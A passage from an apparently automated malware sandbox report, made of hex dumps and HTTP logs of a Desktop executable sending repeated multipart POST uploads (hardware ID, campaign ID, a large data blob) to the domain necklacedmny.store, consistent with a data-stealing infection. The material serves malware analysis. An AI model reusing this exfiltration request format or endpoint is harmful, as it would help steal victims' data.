                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 62 4e 62 63 6f 50 61 7a 55 67 63 52 36 4f 4b 6b 56 64 71 4c 2f 45 54 32 55 4d 69 78 31 70 6c 74 51 64 73 45 71 54 70 58 4f 43 42 6f 6e 59 4c 75 2b 72 6c 55 42 31 53 69 71 71 52 4f 6d 39 2b 34 62 75 46 5a 78 36 4c 43 76 6e 68 48 68 45 53 35 65 6b 46 30 4e 57 72 59 32 71 4b 33 2b 78 34 4e 53 65 62 36 34 33 79 4e 30 2f 78 38 6f 6b 53 4f 6f 63 76 73 4d 67 47 46 53 61 52 34 51 58 67 6d 5a 39 6e 52 71 66 47 7a 58 77 6c 55 70 61 65 6c 54 4a 72 66 74 6d 54 6b 56 38 43 72 77 61 68 73 52 38 6f 4b 39 6e 4e 57 4f 48 38 6b 37 39 65 67 2f 72 5a 59 42 30 65 4f 6b 2b 4e 53 31 4d 72 38 5a 4f 41 64 6c 75 62 44 70 32 4a 4e 6a 30 79 7a 64 55 5a 79 4c 32 76 53 79 4b 2f 34 76 46 6b 42 58 4b 6d 73 70 6b 4f 49 31 4c 64 6f 35 46 54 41 6f 49 66 69 4b 6b 61 53 42 4f 34 30 65 48 73
                                                                                  Data Ascii: bNbcoPazUgcR6OKkVdqL/ET2UMix1pltQdsEqTpXOCBonYLu+rlUB1SiqqROm9+4buFZx6LCvnhHhES5ekF0NWrY2qK3+x4NSeb643yN0/x8okSOocvsMgGFSaR4QXgmZ9nRqfGzXwlUpaelTJrftmTkV8CrwahsR8oK9nNWOH8k79eg/rZYB0eOk+NS1Mr8ZOAdlubDp2JNj0yzdUZyL2vSyK/4vFkBXKmspkOI1Ldo5FTAoIfiKkaSBO40eHs
                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 71 72 35 70 31 38 46 45 65 6a 69 70 46 58 61 69 2f 78 53 2b 6c 72 4a 71 59 57 46 62 56 71 4c 54 72 56 2f 51 6a 67 34 4b 73 53 61 71 66 76 31 42 6b 70 63 71 71 2b 6e 58 35 62 54 76 47 72 72 56 39 79 70 79 4b 46 70 51 59 39 57 74 32 5a 42 63 79 4a 6e 32 64 57 68 2b 37 31 55 53 68 2f 6d 70 62 73 4e 77 70 4f 51 59 50 31 58 6a 49 48 64 75 6d 31 4e 6d 30 2b 37 65 41 35 6e 61 58 32 64 33 61 4b 33 37 52 34 4b 55 4b 75 77 70 6b 79 51 32 62 46 72 34 31 6a 4c 71 63 4f 6f 59 55 2b 59 53 72 6c 30 53 48 4d 6d 59 64 37 52 70 50 6d 38 54 45 6f 66 35 71 57 37 44 63 4b 54 6c 6e 6a 74 55 4d 4c 6b 36 61 64 38 52 73 68 6c 75 48 39 4a 64 44 45 6b 77 70 53 33 74 37 4a 53 53 67 6e 6d 71 36 31 42 6d 64 53 30 61 2b 6c 64 78 61 62 49 70 6d 52 47 6d 45 36 36 66 6c 78 33 4a 47 6e 5a
                                                                                  Data Ascii: qr5p18FEejipFXai/xS+lrJqYWFbVqLTrV/Qjg4KsSaqfv1Bkpcqq+nX5bTvGrrV9ypyKFpQY9Wt2ZBcyJn2dWh+71USh/mpbsNwpOQYP1XjIHdum1Nm0+7eA5naX2d3aK37R4KUKuwpkyQ2bFr41jLqcOoYU+YSrl0SHMmYd7RpPm8TEof5qW7DcKTlnjtUMLk6ad8RshluH9JdDEkwpS3t7JSSgnmq61BmdS0a+ldxabIpmRGmE66flx3JGnZ
                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 77 65 44 56 33 6d 2b 75 4e 4e 6e 74 2b 2f 5a 4f 4a 53 77 36 6e 41 70 32 56 4c 68 46 61 35 63 55 5a 30 4c 32 6e 50 30 4b 54 6c 76 46 63 48 58 36 36 77 6f 41 33 55 6b 37 74 37 72 41 57 4f 6c 4d 32 76 5a 6c 65 48 53 2f 5a 72 41 47 46 6e 59 39 47 61 39 72 65 6e 54 41 70 61 70 71 57 74 58 35 76 62 73 32 6e 73 57 38 57 73 78 4b 56 75 54 34 4e 43 74 33 6c 50 65 53 64 68 33 64 4f 38 2b 76 55 51 53 6c 61 2b 34 76 73 4e 72 64 2b 33 55 75 39 4c 6a 72 6d 4a 74 53 70 47 68 67 54 75 4e 45 39 71 4b 6d 7a 5a 32 71 50 78 76 6c 38 4c 55 71 61 69 6f 45 32 66 32 4c 4e 6c 36 31 44 45 72 38 36 2b 59 6b 57 59 52 4c 70 77 44 6a 5a 6e 59 38 57 61 39 72 65 46 58 51 46 64 70 71 2b 32 44 59 57 64 70 53 50 72 55 59 37 2b 68 36 52 68 53 6f 78 50 74 58 64 41 63 79 31 72 30 74 43 6f 38
                                                                                  Data Ascii: weDV3m+uNNnt+/ZOJSw6nAp2VLhFa5cUZ0L2nP0KTlvFcHX66woA3Uk7t7rAWOlM2vZleHS/ZrAGFnY9Ga9renTApapqWtX5vbs2nsW8WsxKVuT4NCt3lPeSdh3dO8+vUQSla+4vsNrd+3Uu9LjrmJtSpGhgTuNE9qKmzZ2qPxvl8LUqaioE2f2LNl61DEr86+YkWYRLpwDjZnY8Wa9reFXQFdpq+2DYWdpSPrUY7+h6RhSoxPtXdAcy1r0tCo8
                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 63 72 61 37 68 54 4a 66 44 75 79 4f 69 48 63 6a 6d 6e 2f 77 6b 41 59 35 56 39 69 77 65 4b 6e 77 78 6a 6f 33 2b 70 61 6f 51 45 78 47 77 34 76 73 66 31 4a 4f 75 49 37 51 64 69 61 58 56 76 6d 78 43 6e 45 66 78 53 6e 42 59 4c 47 6a 65 31 71 2f 77 39 52 42 4b 58 75 62 36 6d 67 32 5a 77 61 34 73 2f 55 76 44 74 73 44 67 59 6c 43 48 53 50 59 36 44 6a 51 6a 62 39 48 66 71 65 66 36 54 42 70 61 71 72 54 76 53 59 69 54 38 69 50 39 56 73 47 30 79 61 73 6c 55 4a 78 4a 70 6e 64 4c 66 32 74 73 7a 4e 65 69 74 2f 73 65 48 31 71 71 70 4b 35 59 31 63 4b 71 59 50 70 61 67 71 37 57 6f 57 59 42 74 51 72 32 62 41 34 67 5a 31 48 65 31 4b 44 77 6f 30 39 48 63 61 32 75 6f 45 47 62 31 50 77 74 72 46 75 4f 2f 70 54 69 4b 6b 57 62 42 4f 34 6b 48 43 4e 79 4e 34 71 4b 2f 4f 6a 37 52 30
                                                                                  Data Ascii: cra7hTJfDuyOiHcjmn/wkAY5V9iweKnwxjo3+paoQExGw4vsf1JOuI7QdiaXVvmxCnEfxSnBYLGje1q/w9RBKXub6mg2Zwa4s/UvDtsDgYlCHSPY6DjQjb9Hfqef6TBpaqrTvSYiT8iP9VsG0yaslUJxJpndLf2tszNeit/seH1qqpK5Y1cKqYPpagq7WoWYBtQr2bA4gZ1He1KDwo09Hca2uoEGb1PwtrFuO/pTiKkWbBO4kHCNyN4qK/Oj7R0
                                                                                  2024-10-29 11:04:12 UTC1369INData Raw: 2b 78 37 55 6b 36 34 6a 74 42 32 4a 71 4d 71 74 61 55 2b 4a 56 71 52 79 54 57 34 6b 49 2b 50 6b 69 2f 71 34 57 77 52 57 6d 4a 79 43 52 34 72 65 73 32 54 53 59 2f 6d 33 77 4c 77 6f 5a 34 6c 53 74 54 51 41 4f 44 38 6b 68 5a 71 50 2f 61 56 54 42 56 62 6d 37 4f 4e 4a 32 6f 76 38 52 75 46 51 79 36 6a 41 37 6b 74 4c 6d 6b 6d 35 63 77 34 32 5a 32 69 64 67 75 37 32 76 30 34 48 58 71 48 75 70 46 65 64 6b 2f 49 6a 34 68 32 57 35 73 61 6d 65 6b 79 46 51 2f 70 79 51 48 5a 6e 65 35 50 44 37 75 48 31 42 6c 6b 66 35 72 44 6a 46 64 71 55 73 6d 37 74 58 73 43 6c 31 62 35 73 51 70 78 48 38 55 70 77 58 53 70 70 32 4e 53 70 79 59 74 2f 41 45 47 72 72 61 51 50 75 74 53 71 59 4e 4a 6a 2b 62 66 41 76 43 68 6e 69 56 4b 31 4e 41 41 34 50 79 53 46 6d 6f 2f 39 70 56 4d 46 56 75 53
                                                                                  Data Ascii: +x7Uk64jtB2JqMqtaU+JVqRyTW4kI+Pki/q4WwRWmJyCR4res2TSY/m3wLwoZ4lStTQAOD8khZqP/aVTBVbm7ONJ2ov8RuFQy6jA7ktLmkm5cw42Z2idgu72v04HXqHupFedk/Ij4h2W5samekyFQ/pyQHZne5PD7uH1Blkf5rDjFdqUsm7tXsCl1b5sQpxH8UpwXSpp2NSpyYt/AEGrraQPutSqYNJj+bfAvChniVK1NAA4PySFmo/9pVMFVuS


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649712188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:13 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12864
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:13 UTC12864OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-29 11:04:50 UTC1028INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:04:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=gh3dhjmokd5f5kdq0j1i4g178l; expires=Sat, 22 Feb 2025 04:50:52 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPe9t6P4Zd5lFvFo%2FcGVLazfcYEN1%2FC2h9ftA2r%2Fdlkk%2FYZYIodwNlt2hqLDFHbjg8AICDY9uYeSU0uXP%2F2Re6JMvT7gspBp8I73Y%2FlcYH0Sf6q3AL%2BK8q1Vpg%2BfUaz4mWq9av0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2aefc2a736b89-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1811&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13806&delivery_rate=1549491&cwnd=251&unsent_bytes=0&cid=f3e70e0fe180bd1f&ts=37176&x=0"
                                                                                  2024-10-29 11:04:50 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.72
                                                                                  2024-10-29 11:04:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649899188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:51 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15110
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:51 UTC15110OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-29 11:04:51 UTC1012INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:04:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=tq2ulbprjogjb55j4c1dncigk6; expires=Sat, 22 Feb 2025 04:51:30 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhDpJM8cE5S2FZX1uqWpaYqnbSjS6q38m5rhfwoGkMNtwckiUrDV1UvY4BXNKpOAGE71sbUtsQ028ujFy37DB5JmWj3iLuw4qVMclEI2epG3zEBAAyMx1yIqBWUpjp%2BnehoAvMs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2afe92e8bb78d-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1300&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16052&delivery_rate=2210687&cwnd=68&unsent_bytes=0&cid=dc783f018ce248a4&ts=560&x=0"
                                                                                  2024-10-29 11:04:51 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.72
                                                                                  2024-10-29 11:04:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649908188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:52 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 19968
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:52 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-29 11:04:52 UTC4637OUTData Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
                                                                                  Data Ascii: +?2+?2+?o?Mp5p
                                                                                  2024-10-29 11:04:53 UTC1017INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:04:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=0johvvsdnvqm3ngoe3ii9ej6hf; expires=Sat, 22 Feb 2025 04:51:32 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWE8%2BSCFaAo2NmDNHsBWrFlSWWL6x%2BQuGb%2F4DaIZ7fdIvjN5yec31iVJNoVfMu0w9djxam8EJNmKmfGjttFJSuKQSJlIdRNMttOrocH6DtdRhmBGc95jtKt6qSVVS1pdZvRZ6Qk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2aff1bf5883a4-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1372&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=20932&delivery_rate=2038001&cwnd=251&unsent_bytes=0&cid=bb4c1884ac87ea3c&ts=682&x=0"
                                                                                  2024-10-29 11:04:53 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.72
                                                                                  2024-10-29 11:04:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.649919188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:54 UTC283OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1227
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:54 UTC1227OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.649989188.114.96.34432736C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:05:09 UTC285OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 571410
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 8f 28 4d 93 e8 e6 ac cc 08 63 6c e4 4c d5 24 df 86 79 8b 0a 59 79 7c ac bc 51 6a 8a 9e d4 95 c4 f2 c9 b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58
                                                                                  Data Ascii: (MclL$yYy|QjbFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX
                                                                                  2024-10-29 11:05:09 UTC15331OUTData Raw: 27 ac 55 6b 05 24 bd 7e 94 b5 87 e1 07 cc 37 8e dd ee e7 3e 81 09 cc fa 35 f3 81 96 94 82 4a 76 f3 44 e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d
                                                                                  Data Ascii: 'Uk$~7>5JvD?|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_
